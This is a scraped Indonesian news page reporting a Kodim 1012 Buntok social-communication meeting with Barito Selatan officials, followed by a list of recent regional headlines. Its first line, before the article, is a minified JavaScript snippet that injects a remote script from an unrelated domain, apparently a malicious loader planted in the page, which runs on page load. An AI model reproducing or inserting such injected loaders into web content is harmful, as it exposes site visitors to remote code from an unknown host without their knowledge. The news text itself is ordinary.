(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Kodim 1012 Gelar Komsos dengan Aparat Pemerintah Barsel


BUNTOK, Menunjang tugas pokok TNI AD melalui satuan kewilayahan dan mendukung program pemerintahan, Kodim 1012 Buntok menggelar komunikasi sosial (Komsos) dengan aparat pemerintahan Barito Selatan, di aula Makodim, Selasa (26/6).

Dengan tema “Melalui Komunikasi Sosial Dengan Aparat Pemerintah, Kita Tingkatkan Sinergitas Dan Kerjasama Guna Menyiapkan Wilayah Pertahanan Dan Kekuatan Pendukungnya Untuk Tercapainya Tugas Pokok TNI AD”.

Dandim 1012 Buntok Letnan Kolonel Inf Tuwadi mengatakan, Komsos dengan aparat pemerintah ini bertujuan untuk memelihara dan meningkatkan komunikasi dengan aparat pemerintah sehingga terwujudnya ikatan yang harmonis.

“Selain itu juga tujuan Komsos ini untuk menjalin kerja sama antara Pihak TNI, Polri dan Aparat Pemerintahan di daerah demi menjaga kedaulatan dan keutuhan NKRI,” katanya kepada Kanalkalimantan.com, usai acara.

Ia juga mengatakan, pelaksanaan Pemilu di Kabupaten Barsel dapat berjalan dengan aman dan lancar, sehingga kondusifitas wilayah di Kabupaten Barsel tetap terjaga dengan baik.

“Dengan suasana yang kondusif ini hendaknya dapat terus kita jaga, tentunya komunikasi dengan segala unsur juga mesti terjalin dengan baik,” ujar Tuwadi.

Ditambahkan olehnya sekaligus mengajak seluruh aparat pemerintah agar terus meningkatkan kerjasama dan sinergitas dengan TNI, Polri dan Instansi terkait. Serta seluruh komponen masyarakat yang ada di wilayah Kabupaten Barsel khususnya setelah pelaksanaan Pemilu tahun 2019. “Kita ingin sinergitas yang ada semakin baik, guna kelancaran dalam menjaga kondusifitas yang ada semakin baik lagi,” pungkas Tuwadi. (digdo)

Reporter:Digdo
Editor:Bie

Desy Arfianty

Recent Posts

Wabup Kapuas Kunjungi Kecamatan Kapuas Hulu dan Mandau Talawang

KANALKALIMANTAN.COM, KUALA KAPUAS - Wakil Bupati Kapuas Dodo bersama jajaran menempuh jalur sungai dan darat… Read More

2 jam ago

Unjuk Rasa di HSU, GOSTI: Berikan Jabatan ke Orang yang Bertanggung Jawab

‎KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten (Pemkab) Hulu Sungai Utara (HSU) mendapatkan dukungan menjalankan pemerintahan bersih… Read More

3 jam ago

Pesan Edukatif Street Art Dakwah South Borneo Lewat Mural dan Grafiti

KANALKALIMANTAN.COM, BANJARMASIN - Street Art Dakwah South Borneo memanfaatkan seni mural dan grafiti sebagai alat… Read More

4 jam ago

Unjuk Rasa di Halaman DPRD HSU

KANALKALIMANTAN.COM, AMUNTAI – Massa yang tergabung dalam Lembaga Swadaya Masyarakat (LSM) Gerakan Organisasi Sosial Terintegritas… Read More

4 jam ago

Wabup Balangan Serahkan Beasiswa Program KBP ke 1.511 Pelajar

KANALKALIMANTAN.COM, PARINGIN - Wakil Bupati (Wabup) Balangan, Akhmad Fauzi, menyerahkan beasiswa program Kartu Balangan Pintar… Read More

5 jam ago

DKISP Banjar Gelar Penandatanganan Pakta Integritas

KANALKALIMANTAN.COM, MARTAPURA – Kepala Dinas Komunikasi, Informatika, Statistik, dan Persandian (DKISP) Kabupaten Banjar HM Aidil… Read More

5 jam ago

This website uses cookies.